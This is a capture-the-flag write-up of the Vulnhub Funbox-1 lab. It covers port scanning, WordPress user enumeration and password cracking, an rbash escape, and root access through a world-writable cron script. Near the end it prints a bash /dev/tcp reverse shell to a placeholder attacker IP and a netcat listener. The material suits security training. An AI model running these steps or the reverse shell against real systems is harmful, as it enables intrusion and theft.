Vulnhub: Funbox-1
The Funbox series from Vulnhub is a great series for beginners. It has all the classic boot2root services.
Looking back, I really didn’t explain my steps here at all, yikes!
Scanning
crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Nmap scan report for 192.168.56.116
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
More Focused Scanning
crazyeights@es-base:~$ nmap -A -p- 192.168.56.116
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 20:06 EDT
Nmap scan report for 192.168.56.116
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data.
[SNIP]
Web:
If you go to IP in your browser you are redirected to:
http://funbox.fritz.box/
Add funbox.fritz.box to your hosts file:
crazyeights@es-base:~$ sudo vim /etc/hosts
#CTF
192.168.56.116 funbox.fritz.box
Refresh the page and you get a wordpress:
Using wpscan to enumerate users:
crazyeights@es-base:~$ wpscan --url http://funbox.fritz.box -e u
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] joe
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Cracking user passwords:
crazyeights@es-base:~$ wpscan --url http://funbox.fritz.box --passwords lists/rockyou-40.txt --usernames joe,admin
[!] Valid Combinations Found:
| Username: joe, Password: 12345
| Username: admin, Password: iubire
With a valid login, we can login and replace a theme template php file with a php reverse shell.
Going to themes:
Location of 404.php: ` http://funbox.fritz.box/wp-content/themes/twentyseventeen/404.php `
Tried to put a reverse shell in 404.php gives you an error
FTP:
Login as joe using the credentials found for wordpress: joe:12345
crazyeights@es-base:~$ ftp funbox.fritz.box
Connected to funbox.fritz.box.
220 ProFTPD Server (Debian) [::ffff:192.168.56.116]
Name (funbox.fritz.box:crazyeights): joe
331 Password required for joe
Password:
230 User joe logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw------- 1 joe joe 998 Jul 18 09:49 mbox
Download the file mbox:
ftp> get mbox
local: mbox remote: mbox
200 PORT command successful
150 Opening BINARY mode data connection for mbox (998 bytes)
226 Transfer complete
998 bytes received in 0.01 secs (66.7952 kB/s)
ftp>
The file mbox contains:
From root@funbox Fri Jun 19 13:12:38 2020
Return-Path: <root@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 0)
id 2D257446B0; Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
Subject: Backups
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619131238.2D257446B0@funbox.fritz.box>
Date: Fri, 19 Jun 2020 13:12:38 +0000 (UTC)
From: root <root@funbox>
Hi Joe, please tell funny the backupscript is done.
From root@funbox Fri Jun 19 13:15:21 2020
Return-Path: <root@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 0)
id 8E2D4446B0; Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
Subject: Backups
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619131521.8E2D4446B0@funbox.fritz.box>
Date: Fri, 19 Jun 2020 13:15:21 +0000 (UTC)
From: root <root@funbox>
Joe, WTF!?!?!?!?!?! Change your password right now! 12345 is an recommendation to fire you.
trying to log in as joe with password 12345
SSH:
crazyeights@es-base:~$ ssh joe@funbox.fritz.box
Joe is stuck in rbash:
joe@funbox:~$ cd /var/www/html
-rbash: cd: restricted
Breaking out of rbash:
That was easy. You can breakout by calling bash interactively:
joe@funbox:~$ bash -i
joe@funbox:~$ cd /var/www/html
joe@funbox:/var/www/html$
Snooping around:
joe@funbox:/var/www/html$ cd /home
joe@funbox:/home$ ls
funny joe
joe@funbox:/home$ cd funny/
joe@funbox:/home/funny$ ls
html.tar
joe@funbox:/home/funny$ file html.tar
html.tar: POSIX tar archive (GNU)
joe@funbox:/home/funny$ tar -xvf html.tar
var/www/html/
tar: var: Cannot mkdir: Permission denied
tar: var/www/html: Cannot mkdir: No such file or directory
var/www/html/index.php
tar: var: Cannot mkdir: Permission denied
tar: var/www/html/index.php: Cannot open: No such file or directory
var/www/html/wp-cron.php
Checking if joe can run anything with elevated privileges:
joe@funbox:/home/funny$ sudo -l
[sudo] password for joe:
Sorry, user joe may not run sudo on funbox.
joe@funbox:/home/funny$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/newgrp
[SNIP]
Checking mysql for credentials:
joe@funbox:/var/www/html$ mysql -u wordpress -p'wordpress'
The user funny is a admin/root user:
mysql> select * from wp_users;
-+---------------------+-----------------------------------------------+-------------+-----
| 1 | admin | $P$BGUPID16QexYI9XRblG9k8rnr0TMJN1 | admin | funny@funbox.box |
Checking joe’s mail:
joe@funbox:/var/www/html$ mail
"/var/mail/joe": 2 messages 2 new
>N 1 funny Fri Jun 19 14:31 13/501 Reminder
N 2 funny Fri Jun 19 14:32 13/501 Reminder
?
Return-Path: <funny@funbox>
X-Original-To: joe@funbox
Delivered-To: joe@funbox
Received: by funbox.fritz.box (Postfix, from userid 1000)
id A7979446B3; Fri, 19 Jun 2020 14:31:26 +0000 (UTC)
Subject: Reminder
To: <joe@funbox>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200619143126.A7979446B3@funbox.fritz.box>
Date: Fri, 19 Jun 2020 14:31:26 +0000 (UTC)
From: funny <funny@funbox>
Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run.
Finding the backup script
joe@funbox:/home/funny$ ls -lai
total 47608
533886 drwxr-xr-x 3 funny funny 4096 Jul 18 10:02 .
524290 drwxr-xr-x 4 root root 4096 Jun 19 11:50 ..
536659 -rwxrwxrwx 1 funny funny 55 Jul 18 10:15 .backup.sh
[SNIP]
This script may be run as cronjob
joe@funbox:/home/funny$ cat .backup.sh
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
Another file in the dir:
joe@funbox:/home/funny$ cat .reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox
-
The script is being run every minute
-
It took me a long time to release this because the time is wrong.
joe@funbox:/home/funny$ stat html.tar
File: html.tar
Size: 48701440 Blocks: 95120 IO Block: 4096 regular file
Device: 802h/2050d Inode: 533571 Links: 1
Access: (0664/-rw-rw-r--) Uid: ( 1000/ funny) Gid: ( 1000/ funny)
Access: 2020-10-09 00:34:45.831977679 +0000
Modify: 2020-10-09 00:58:01.619961040 +0000
Change: 2020-10-09 00:58:01.619961040 +0000
Birth: -
joe@funbox:/home/funny$ date
Fri 09 Oct 2020 12:58:25 AM UTC
Getting the root flag:
Because I am lazy:
#!/bin/bash
tar -cf /home/funny/html.tar /var/www/html
cp /root/flag.txt /home/flag.txt
You are supposed to put a reverse shell, and start another listener to connect to it:
# ie. in backup:
/bin/bash -i >& /dev/tcp/AAA.BBB.CC.DD/1234 0>&1
# On your machine
nc -lvp 1234
Retrieving the root flag:
joe@funbox:/home/funny$ cd /home
joe@funbox:/home$ ls
flag.txt funny joe
joe@funbox:/home$ cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
FIN.